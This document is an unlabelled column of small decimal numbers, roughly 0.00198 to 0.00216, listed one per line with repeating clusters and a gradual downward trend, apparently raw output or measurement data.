0.00214789
0.00215236
0.00214782
0.00215238
0.00214797
0.00215237
0.00215235
0.00214789
0.0021572
0.00215236
0.00213359
0.00213843
0.00213843
0.00214297
0.00214297
0.002143
0.0021384
0.0021384
0.00213359
0.0021292
0.00213361
0.00212905
0.0021336
0.00213358
0.00212912
0.00213359
0.0021292
0.00213361
0.00212905
0.00213358
0.0021336
0.00212912
0.0021385
0.00214296
0.00214298
0.00213846
0.00213858
0.00214297
0.00213844
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213844
0.00213858
0.00213361
0.00212902
0.00212902
0.00213359
0.00213359
0.00212905
0.00213359
0.00213843
0.00215238
0.0021524
0.00214783
0.00214787
0.00215238
0.00215239
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216178
0.00215722
0.00216177
0.00215726
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00213844
0.002143
0.00214299
0.0021385
0.00214299
0.00213848
0.00213844
0.0021336
0.00213359
0.00212907
0.00212905
0.00213362
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.0021291
0.00212906
0.00212905
0.00213362
0.00213361
0.00213844
0.00214299
0.002143
0.0021385
0.00214299
0.00213844
0.00213848
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.00212906
0.0021291
0.00213361
0.00213362
0.00212906
0.00215238
0.0021524
0.00214787
0.00214783
0.00215239
0.00215238
0.00214782
0.00215721
0.00216179
0.00215722
0.00215723
0.00216177
0.00215721
0.00215728
0.00216178
0.00216178
0.00215726
0.00216177
0.00215722
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00215238
0.0021524
0.00214783
0.00214787
0.00215238
0.00215239
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216179
0.00216177
0.00215722
0.00215726
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00213844
0.002143
0.00214299
0.0021385
0.00214299
0.00213848
0.00213844
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.0021291
0.00212906
0.00213362
0.00213361
0.00212906
0.00213844
0.00214299
0.002143
0.0021385
0.00214299
0.00213844
0.00213848
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.00212906
0.0021291
0.00213361
0.00213362
0.00212906
0.00215239
0.00214779
0.00214779
0.00215236
0.00215236
0.00214781
0.00215728
0.00216177
0.00216175
0.00215724
0.00215721
0.00216176
0.00215736
0.00215728
0.00216176
0.00216175
0.00215723
0.00215736
0.00216176
0.00215721
0.0021572
0.00216175
0.00216175
0.00215718
0.00216178
0.00215718
0.00215236
0.00214782
0.00215238
0.00214797
0.00215235
0.00215237
0.00214789
0.00215236
0.00214782
0.00215238
0.00214797
0.00215237
0.00215235
0.00214789
0.0021572
0.00215236
0.00213359
0.00213843
0.00213843
0.00214297
0.00214297
0.002143
0.0021384
0.0021384
0.00213359
0.0021292
0.00213361
0.00212906
0.00213359
0.00213358
0.00212912
0.00213359
0.0021292
0.00213361
0.00212905
0.00213358
0.0021336
0.00212912
0.0021385
0.00214296
0.00214298
0.00213846
0.00213858
0.00214297
0.00213844
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213844
0.00213858
0.00213361
0.00212902
0.00212902
0.00213359
0.00213359
0.00212905
0.00213359
0.00213843
0.00215238
0.0021524
0.00214787
0.00214783
0.00215239
0.00215238
0.00214782
0.00215721
0.00216179
0.00215722
0.00215723
0.00216177
0.00215721
0.00215728
0.00216179
0.00216178
0.00215726
0.00216177
0.00215722
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00215238
0.0021524
0.00214787
0.00214783
0.00215239
0.00215238
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216178
0.00216177
0.00215726
0.00215722
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00213844
0.002143
0.00214299
0.0021385
0.00214299
0.00213848
0.00213844
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.0021291
0.00212906
0.00213362
0.00213361
0.00212905
0.00213844
0.002143
0.00214299
0.0021385
0.00214299
0.00213848
0.00213844
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.0021291
0.00212906
0.00213362
0.00213361
0.00212905
0.0021572
0.00215236
0.0021572
0.00215236
0.00213843
0.00214297
0.00214297
0.002143
0.0021384
0.0021384
0.00213359
0.0021292
0.00213361
0.00212905
0.00212912
0.0021336
0.00213358
0.00213359
0.0021292
0.00213361
0.00212905
0.00212912
0.0021336
0.00213358
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213858
0.00213844
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213858
0.00213844
0.00213361
0.00212902
0.00212902
0.00212905
0.00213359
0.00213359
0.00213359
0.00213843
0.00213359
0.00213843
0.00211967
0.00211484
0.00211967
0.00211484
0.00211486
0.00211028
0.00211028
0.00211484
0.00211484
0.0021103
0.00211975
0.00212422
0.0021242
0.0021197
0.00212421
0.00211968
0.00211982
0.00211975
0.00212422
0.0021242
0.0021197
0.00212421
0.00211968
0.00211982
0.00211967
0.00212421
0.00212421
0.00212424
0.00211965
0.00211965
0.00211484
0.00211031
0.00211486
0.00211045
0.00211483
0.00211038
0.00211484
0.00211484
0.00211031
0.00211486
0.00211045
0.00211483
0.00211038
0.00211484
0.00209611
0.00210093
0.00209611
0.00210093
0.00210093
0.00210547
0.00210547
0.0021055
0.00210091
0.00210091
0.00209611
0.00209172
0.00209613
0.00209158
0.0020961
0.00209611
0.00209165
0.00209611
0.00209172
0.00209613
0.00209158
0.0020961
0.00209611
0.00209165
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210094
0.00210108
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210094
0.00210108
0.00209613
0.00209155
0.00209155
0.00209611
0.00209611
0.00209157
0.00211486
0.00211487
0.00211032
0.00211035
0.00211486
0.00211487
0.00211031
0.00211967
0.00212424
0.00211968
0.00212422
0.00211969
0.00211968
0.00211974
0.00212423
0.00212424
0.00211969
0.00212423
0.00211972
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00210094
0.00210549
0.0021055
0.002101
0.00210549
0.00210095
0.00210099
0.00209612
0.00209611
0.00209159
0.00209158
0.00209614
0.00210094
0.0021055
0.00210095
0.00210548
0.00210096
0.00209613
0.00209614
0.00209159
0.00209163
0.00209158
0.00209613
0.00209613
0.00210094
0.00210549
0.0021055
0.002101
0.00210549
0.00210095
0.00210099
0.00209612
0.00209611
0.00209159
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210548
0.00210096
0.00209613
0.00209614
0.00209159
0.00209163
0.00209613
0.00209613
0.00209158
0.00211486
0.00211028
0.00211028
0.00211484
0.00211484
0.0021103
0.00211975
0.00212422
0.0021242
0.0021197
0.00211968
0.00212421
0.00211982
0.00211975
0.00212422
0.0021242
0.0021197
0.00211982
0.00212421
0.00211968
0.00211967
0.00212421
0.00212421
0.00211965
0.00212424
0.00211965
0.00211484
0.00211031
0.00211486
0.00211045
0.00211483
0.00211484
0.00211038
0.00211484
0.00211031
0.00211486
0.00211045
0.00211484
0.00211483
0.00211038
0.00211967
0.00211484
0.00209611
0.00210093
0.00210093
0.00210547
0.00210547
0.0021055
0.00210091
0.00210091
0.00209611
0.00209172
0.00209613
0.00209158
0.00209611
0.0020961
0.00209165
0.00209611
0.00209172
0.00209613
0.00209158
0.0020961
0.00209611
0.00209165
0.00210101
0.00210546
0.00210547
0.00210096
0.00210108
0.00210547
0.00210094
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210094
0.00210108
0.00209613
0.00209155
0.00209155
0.00209611
0.00209611
0.00209157
0.00209611
0.00210093
0.00211486
0.00211487
0.00211032
0.00211035
0.00211486
0.00211487
0.00211031
0.00211967
0.00212424
0.00211969
0.00212423
0.00211969
0.00211968
0.00211974
0.00212423
0.00212424
0.00211969
0.00212423
0.00211972
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00210094
0.0021055
0.00210549
0.002101
0.00210549
0.00210099
0.00210095
0.00209612
0.00209611
0.00209159
0.00209158
0.00209614
0.00210094
0.0021055
0.00210095
0.00210549
0.00210096
0.00209613
0.00209614
0.00209162
0.00209159
0.00209158
0.00209614
0.00209613
0.00210094
0.00210549
0.0021055
0.002101
0.00210549
0.00210095
0.00210099
0.00209612
0.00209611
0.0020916
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210548
0.00210096
0.00209613
0.00209614
0.00209159
0.00209163
0.00209613
0.00209613
0.00209158
0.00211486
0.00211487
0.00211035
0.00211032
0.00211487
0.00211486
0.00211031
0.00211967
0.00212424
0.00211969
0.00211969
0.00212423
0.00211968
0.00211974
0.00212424
0.00212423
0.00211972
0.00212423
0.00211969
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00211486
0.00211487
0.00211032
0.00211035
0.00211486
0.00211487
0.00211031
0.00211967
0.00212424
0.00211969
0.00212423
0.00211969
0.00211968
0.00211974
0.00212423
0.00212424
0.00212423
0.00211969
0.00211972
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00210094
0.0021055
0.00210549
0.002101
0.00210549
0.00210099
0.00210095
0.00209612
0.00209611
0.0020916
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210549
0.00210096
0.00209613
0.00209614
0.00209163
0.00209159
0.00209614
0.00209613
0.00209158
0.00210094
0.00210549
0.0021055
0.002101
0.00210549
0.00210095
0.00210099
0.00209612
0.00209611
0.0020916
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210549
0.00210096
0.00209613
0.00209614
0.00209159
0.00209163
0.00209613
0.00209614
0.00209158
0.00211486
0.00211028
0.00211028
0.00211484
0.00211484
0.0021103
0.00211975
0.00212422
0.0021242
0.0021197
0.00211968
0.00212421
0.00211982
0.00211975
0.00212422
0.0021242
0.0021197
0.00211982
0.00212421
0.00211968
0.00211967
0.00212421
0.00212421
0.00211965
0.00212424
0.00211965
0.00211484
0.00211031
0.00211486
0.00211045
0.00211483
0.00211484
0.00211038
0.00211484
0.00211031
0.00211486
0.00211045
0.00211484
0.00211483
0.00211038
0.00211967
0.00211484
0.00209611
0.00210093
0.00210093
0.00210547
0.00210547
0.0021055
0.00210091
0.00210091
0.00209611
0.00209172
0.00209613
0.00209158
0.00209611
0.0020961
0.00209165
0.00209611
0.00209172
0.00209613
0.00209158
0.0020961
0.00209611
0.00209165
0.00210101
0.00210546
0.00210547
0.00210096
0.00210108
0.00210547
0.00210094
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210094
0.00210108
0.00209613
0.00209155
0.00209155
0.00209611
0.00209611
0.00209157
0.00209611
0.00210093
0.00211486
0.00211487
0.00211035
0.00211032
0.00211487
0.00211486
0.00211031
0.00211967
0.00212424
0.00211969
0.00211969
0.00212423
0.00211968
0.00211974
0.00212424
0.00212423
0.00211972
0.00212423
0.00211969
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00211486
0.00211487
0.00211035
0.00211032
0.00211487
0.00211486
0.00211031
0.00211967
0.00212424
0.00211969
0.00212422
0.00211969
0.00211968
0.00211974
0.00212424
0.00212423
0.00212423
0.00211972
0.00211969
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00210094
0.0021055
0.00210549
0.002101
0.00210549
0.00210099
0.00210095
0.00209612
0.00209611
0.0020916
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210549
0.00210096
0.00209613
0.00209614
0.00209163
0.00209159
0.00209614
0.00209613
0.00209158
0.00210094
0.0021055
0.00210549
0.002101
0.00210549
0.00210099
0.00210095
0.00209612
0.00209611
0.00209159
0.00209614
0.00209158
0.00210094
0.0021055
0.00210095
0.00210548
0.00210096
0.00209613
0.00209614
0.00209163
0.00209159
0.00209614
0.00209613
0.00209158
0.00211967
0.00211484
0.00211967
0.00211484
0.00210093
0.00210547
0.00210547
0.0021055
0.00210091
0.00210091
0.00209611
0.00209172
0.00209613
0.00209158
0.00209165
0.00209611
0.0020961
0.00209611
0.00209172
0.00209613
0.00209158
0.00209165
0.00209611
0.0020961
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210108
0.00210094
0.00210101
0.00210546
0.00210547
0.00210096
0.00210547
0.00210108
0.00210094
0.00209613
0.00209155
0.00209155
0.00209157
0.00209611
0.00209611
0.00209611
0.00210093
0.00209611
0.00210093
0.00208222
0.0020774
0.00208222
0.0020774
0.00207742
0.00207284
0.00207284
0.00207739
0.00207739
0.00207286
0.00208229
0.00208675
0.00208674
0.00208225
0.00208675
0.00208223
0.00208236
0.00208229
0.00208675
0.00208674
0.00208225
0.00208675
0.00208223
0.00208236
0.00208222
0.00208675
0.00208675
0.00208677
0.0020822
0.0020822
0.0020774
0.00207287
0.00207741
0.00207301
0.00207739
0.00207294
0.0020774
0.0020774
0.00207287
0.00207741
0.00207301
0.00207739
0.00207294
0.0020774
0.0020587
0.00206352
0.0020587
0.00206352
0.00206352
0.00206805
0.00206805
0.00206807
0.0020635
0.0020635
0.0020587
0.00205432
0.00205872
0.00205418
0.0020587
0.0020587
0.00205425
0.0020587
0.00205432
0.00205872
0.00205419
0.0020587
0.0020587
0.00205425
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206353
0.00206366
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206353
0.00206366
0.00205873
0.00205416
0.00205416
0.0020587
0.0020587
0.00205418
0.00207741
0.00207743
0.00207288
0.00207292
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208222
0.00208228
0.00208677
0.00208678
0.00208223
0.00208677
0.00208227
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206353
0.00206357
0.00205872
0.00205871
0.0020542
0.00205418
0.00205873
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205419
0.00205423
0.00205418
0.00205872
0.00205873
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206353
0.00206357
0.00205872
0.00205871
0.0020542
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205419
0.00205423
0.00205872
0.00205873
0.00205418
0.00207742
0.00207284
0.00207284
0.0020774
0.0020774
0.00207287
0.00208229
0.00208675
0.00208674
0.00208225
0.00208223
0.00208675
0.00208236
0.00208229
0.00208675
0.00208674
0.00208225
0.00208236
0.00208675
0.00208223
0.00208222
0.00208675
0.00208675
0.0020822
0.00208678
0.0020822
0.0020774
0.00207287
0.00207742
0.00207301
0.00207739
0.0020774
0.00207294
0.0020774
0.00207287
0.00207741
0.00207301
0.0020774
0.00207739
0.00207294
0.00208222
0.0020774
0.0020587
0.00206352
0.00206352
0.00206805
0.00206805
0.00206807
0.0020635
0.0020635
0.0020587
0.00205432
0.00205872
0.00205418
0.0020587
0.0020587
0.00205425
0.0020587
0.00205432
0.00205872
0.00205418
0.0020587
0.0020587
0.00205425
0.00206359
0.00206804
0.00206805
0.00206355
0.00206366
0.00206805
0.00206353
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206353
0.00206366
0.00205873
0.00205416
0.00205416
0.0020587
0.0020587
0.00205418
0.0020587
0.00206352
0.00207741
0.00207743
0.00207288
0.00207292
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208222
0.00208228
0.00208677
0.00208678
0.00208223
0.00208677
0.00208227
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206357
0.00206353
0.00205872
0.00205871
0.0020542
0.00205418
0.00205873
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205874
0.00205423
0.00205419
0.00205418
0.00205873
0.00205872
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206353
0.00206357
0.00205872
0.00205871
0.0020542
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205874
0.00205419
0.00205423
0.00205872
0.00205873
0.00205418
0.00207741
0.00207743
0.00207292
0.00207288
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208224
0.00208676
0.00208223
0.00208228
0.00208678
0.00208677
0.00208227
0.00208677
0.00208223
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00207741
0.00207743
0.00207288
0.00207292
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208222
0.00208228
0.00208677
0.00208678
0.00208677
0.00208223
0.00208227
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206357
0.00206353
0.00205872
0.00205871
0.0020542
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205423
0.00205419
0.00205873
0.00205872
0.00205418
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206353
0.00206357
0.00205872
0.00205871
0.00205419
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205419
0.00205422
0.00205872
0.00205873
0.00205418
0.00207742
0.00207285
0.00207285
0.0020774
0.0020774
0.00207287
0.00208229
0.00208675
0.00208674
0.00208225
0.00208223
0.00208675
0.00208236
0.00208229
0.00208675
0.00208674
0.00208225
0.00208236
0.00208675
0.00208223
0.00208222
0.00208675
0.00208675
0.0020822
0.00208678
0.0020822
0.0020774
0.00207287
0.00207741
0.00207301
0.00207739
0.0020774
0.00207294
0.0020774
0.00207287
0.00207742
0.00207301
0.0020774
0.00207739
0.00207294
0.00208222
0.0020774
0.0020587
0.00206352
0.00206352
0.00206805
0.00206805
0.00206807
0.0020635
0.0020635
0.0020587
0.00205432
0.00205872
0.00205419
0.0020587
0.0020587
0.00205425
0.0020587
0.00205432
0.00205872
0.00205419
0.0020587
0.0020587
0.00205425
0.00206359
0.00206804
0.00206805
0.00206355
0.00206366
0.00206805
0.00206353
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206353
0.00206366
0.00205873
0.00205416
0.00205416
0.0020587
0.0020587
0.00205418
0.0020587
0.00206352
0.00207742
0.00207743
0.00207292
0.00207288
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208224
0.00208676
0.00208223
0.00208228
0.00208678
0.00208677
0.00208227
0.00208677
0.00208223
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00207741
0.00207743
0.00207292
0.00207288
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208222
0.00208228
0.00208678
0.00208677
0.00208677
0.00208227
0.00208223
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206357
0.00206353
0.00205872
0.00205871
0.0020542
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205423
0.00205419
0.00205873
0.00205872
0.00205418
0.00206353
0.00206807
0.00206807
0.00206358
0.00206807
0.00206357
0.00206353
0.00205872
0.00205871
0.0020542
0.00205873
0.00205418
0.00206352
0.00206808
0.00206353
0.00206806
0.00206354
0.00205872
0.00205873
0.00205423
0.00205419
0.00205873
0.00205872
0.00205418
0.00208222
0.0020774
0.00208222
0.0020774
0.00206352
0.00206805
0.00206805
0.00206807
0.0020635
0.0020635
0.0020587
0.00205432
0.00205872
0.00205418
0.00205425
0.0020587
0.0020587
0.0020587
0.00205432
0.00205872
0.00205418
0.00205425
0.0020587
0.0020587
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206366
0.00206353
0.00206359
0.00206804
0.00206805
0.00206355
0.00206805
0.00206366
0.00206353
0.00205873
0.00205415
0.00205415
0.00205417
0.0020587
0.0020587
0.0020587
0.00206352
0.0020587
0.00206352
0.00204484
0.00204003
0.00204484
0.00204003
0.00204005
0.00203548
0.00203548
0.00204003
0.00204003
0.0020355
0.00204491
0.00204936
0.00204936
0.00204487
0.00204936
0.00204485
0.00204498
0.00204491
0.00204936
0.00204936
0.00204487
0.00204936
0.00204485
0.00204498
0.00204484
0.00204936
0.00204936
0.00204939
0.00204482
0.00204482
0.00204003
0.00203551
0.00204005
0.00203564
0.00204002
0.00203558
0.00204003
0.00204003
0.00203551
0.00204005
0.00203564
0.00204002
0.00203558
0.00204002
0.00202137
0.00202617
0.00202137
0.00202617
0.00202618
0.0020307
0.0020307
0.00203072
0.00202616
0.00202616
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202625
0.00203069
0.00203069
0.0020262
0.0020307
0.00202619
0.00202631
0.00202625
0.00203069
0.0020307
0.0020262
0.0020307
0.00202619
0.00202631
0.0020214
0.00201683
0.00201683
0.00202137
0.00202137
0.00201685
0.00204005
0.00204006
0.00203552
0.00203555
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204938
0.00204486
0.00204484
0.0020449
0.00204938
0.00204939
0.00204485
0.00204938
0.00204489
0.00204004
0.00203552
0.00204003
0.00204006
0.00203551
0.00202618
0.00203072
0.00203072
0.00202624
0.00203072
0.00202619
0.00202622
0.00202138
0.00202137
0.00201687
0.00201685
0.0020214
0.00202618
0.00203073
0.00202619
0.00203071
0.0020262
0.00202139
0.0020214
0.00201686
0.0020169
0.00201686
0.00202139
0.00202139
0.00202618
0.00203072
0.00203072
0.00202624
0.00203072
0.00202619
0.00202622
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202618
0.00203073
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.00201686
0.0020169
0.00202139
0.0020214
0.00201686
0.00204005
0.00203548
0.00203548
0.00204003
0.00204003
0.0020355
0.00204491
0.00204936
0.00204936
0.00204486
0.00204485
0.00204936
0.00204498
0.00204491
0.00204936
0.00204936
0.00204486
0.00204498
0.00204936
0.00204485
0.00204484
0.00204936
0.00204936
0.00204482
0.00204939
0.00204482
0.00204003
0.00203551
0.00204005
0.00203564
0.00204002
0.00204002
0.00203558
0.00204003
0.00203551
0.00204004
0.00203564
0.00204002
0.00204002
0.00203558
0.00204484
0.00204003
0.00202137
0.00202617
0.00202617
0.0020307
0.0020307
0.00203072
0.00202616
0.00202615
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202625
0.00203069
0.00203069
0.0020262
0.00202631
0.0020307
0.00202618
0.00202625
0.00203069
0.00203069
0.0020262
0.0020307
0.00202618
0.00202631
0.0020214
0.00201683
0.00201683
0.00202137
0.00202137
0.00201685
0.00202137
0.00202617
0.00204005
0.00204006
0.00203552
0.00203555
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204938
0.00204486
0.00204484
0.0020449
0.00204938
0.00204939
0.00204485
0.00204938
0.00204489
0.00204004
0.00203552
0.00204003
0.00204006
0.00203551
0.00202618
0.00203072
0.00203072
0.00202624
0.00203072
0.00202622
0.00202619
0.00202138
0.00202137
0.00201687
0.00201685
0.0020214
0.00202618
0.00203073
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.0020169
0.00201686
0.00201686
0.0020214
0.00202139
0.00202618
0.00203072
0.00203072
0.00202624
0.00203072
0.00202619
0.00202623
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202618
0.00203073
0.00202619
0.00203071
0.0020262
0.00202139
0.0020214
0.00201686
0.0020169
0.00202139
0.0020214
0.00201686
0.00204004
0.00204006
0.00203555
0.00203552
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204486
0.00204938
0.00204484
0.0020449
0.00204939
0.00204938
0.00204489
0.00204938
0.00204485
0.00204004
0.00203552
0.00204003
0.00204006
0.0020355
0.00204004
0.00204006
0.00203552
0.00203555
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204937
0.00204486
0.00204484
0.0020449
0.00204938
0.00204939
0.00204938
0.00204485
0.00204488
0.00204004
0.00203552
0.00204003
0.00204006
0.0020355
0.00202618
0.00203072
0.00203072
0.00202624
0.00203071
0.00202622
0.00202619
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202617
0.00203072
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.0020169
0.00201686
0.00202139
0.00202139
0.00201686
0.00202618
0.00203072
0.00203072
0.00202624
0.00203071
0.00202619
0.00202622
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202617
0.00203073
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.00201686
0.0020169
0.00202139
0.00202139
0.00201686
0.00204005
0.00203548
0.00203548
0.00204003
0.00204003
0.0020355
0.00204491
0.00204936
0.00204936
0.00204487
0.00204485
0.00204936
0.00204498
0.00204491
0.00204936
0.00204936
0.00204487
0.00204498
0.00204936
0.00204485
0.00204484
0.00204936
0.00204936
0.00204482
0.00204939
0.00204482
0.00204003
0.00203551
0.00204005
0.00203564
0.00204002
0.00204002
0.00203558
0.00204003
0.00203551
0.00204005
0.00203564
0.00204003
0.00204002
0.00203558
0.00204484
0.00204003
0.00202137
0.00202617
0.00202617
0.0020307
0.0020307
0.00203072
0.00202616
0.00202616
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202137
0.00201699
0.00202139
0.00201686
0.00202137
0.00202137
0.00201692
0.00202625
0.00203069
0.00203069
0.0020262
0.00202631
0.0020307
0.00202619
0.00202625
0.00203069
0.00203069
0.0020262
0.0020307
0.00202618
0.00202631
0.0020214
0.00201683
0.00201683
0.00202137
0.00202137
0.00201685
0.00202137
0.00202617
0.00204004
0.00204006
0.00203555
0.00203552
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204486
0.00204938
0.00204484
0.0020449
0.00204939
0.00204938
0.00204489
0.00204938
0.00204485
0.00204004
0.00203552
0.00204003
0.00204006
0.0020355
0.00204004
0.00204006
0.00203555
0.00203552
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204938
0.00204486
0.00204484
0.0020449
0.00204939
0.00204938
0.00204938
0.00204489
0.00204485
0.00204004
0.00203552
0.00204003
0.00204006
0.0020355
0.00202618
0.00203072
0.00203072
0.00202624
0.00203071
0.00202622
0.00202619
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202617
0.00203073
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.0020169
0.00201686
0.00202139
0.00202139
0.00201686
0.00202618
0.00203072
0.00203072
0.00202624
0.00203071
0.00202622
0.00202619
0.00202138
0.00202137
0.00201687
0.0020214
0.00201685
0.00202617
0.00203073
0.00202619
0.00203071
0.00202619
0.00202139
0.0020214
0.0020169
0.00201686
0.00202139
0.00202139
0.00201686
0.00204483
0.00204003
0.00204484
0.00204003
0.00202617
0.0020307
0.0020307
0.00203072
0.00202615
0.00202615
0.00202137
0.00201699
0.00202139
0.00201686
0.00201692
0.00202137
0.00202137
0.00202137
0.00201699
0.00202139
0.00201686
0.00201692
0.00202137
0.00202137
0.00202625
0.00203069
0.00203069
0.0020262
0.0020307
0.00202631
0.00202618
0.00202625
0.00203069
0.00203069
0.0020262
0.0020307
0.00202631
0.00202618
0.0020214
0.00201683
0.00201683
0.00201685
0.00202137
0.00202137
0.00202137
0.00202617
0.00202137
0.00202617
0.00200753
0.00200274
0.00200753
0.00200274
0.00200276
0.0019982
0.0019982
0.00200274
0.00200274
0.00199822
0.0020076
0.00201205
0.00201205
0.00200756
0.00201205
0.00200754
0.00200767
0.0020076
0.00201205
0.00201205
0.00200756
0.00201205
0.00200754
0.00200767
0.00200753
0.00201205
0.00201205
0.00201208
0.00200752
0.00200752
0.00200274
0.00199823
0.00200276
0.00199836
0.00200273
0.00199829
0.00200273
0.00200274
0.00199823
0.00200276
0.00199836
0.00200273
0.00199829
0.00200273
0.00198413
0.00198892
0.00198413
0.00198892
0.00198892
0.00199343
0.00199343
0.00199345
0.0019889
0.0019889
0.00198413
0.00197975
0.00198414
0.00197963
0.00198412
0.00198412
0.00197969
0.00198413
0.00197975
0.00198415
0.00197963
0.00198412
0.00198412
0.00197969
0.00198899
0.00199343
0.00199342
0.00198894
0.00199343
0.00198893
0.00198905
0.00198899
0.00199343
0.00199342
0.00198894
0.00199343
0.00198893
0.00198905
0.00198415
0.0019796
0.0019796
0.00198413
0.00198413
0.00197962
0.00200275
0.00200276
0.00199824
0.00199827
0.00200276
0.00200276
0.00199823
0.00200753
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.0020076
0.00201207
0.00201208
0.00200755
0.00201207
0.00200758
0.00200275
0.00199824
0.00200274
0.00200277
0.00199822
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198893
0.00198896
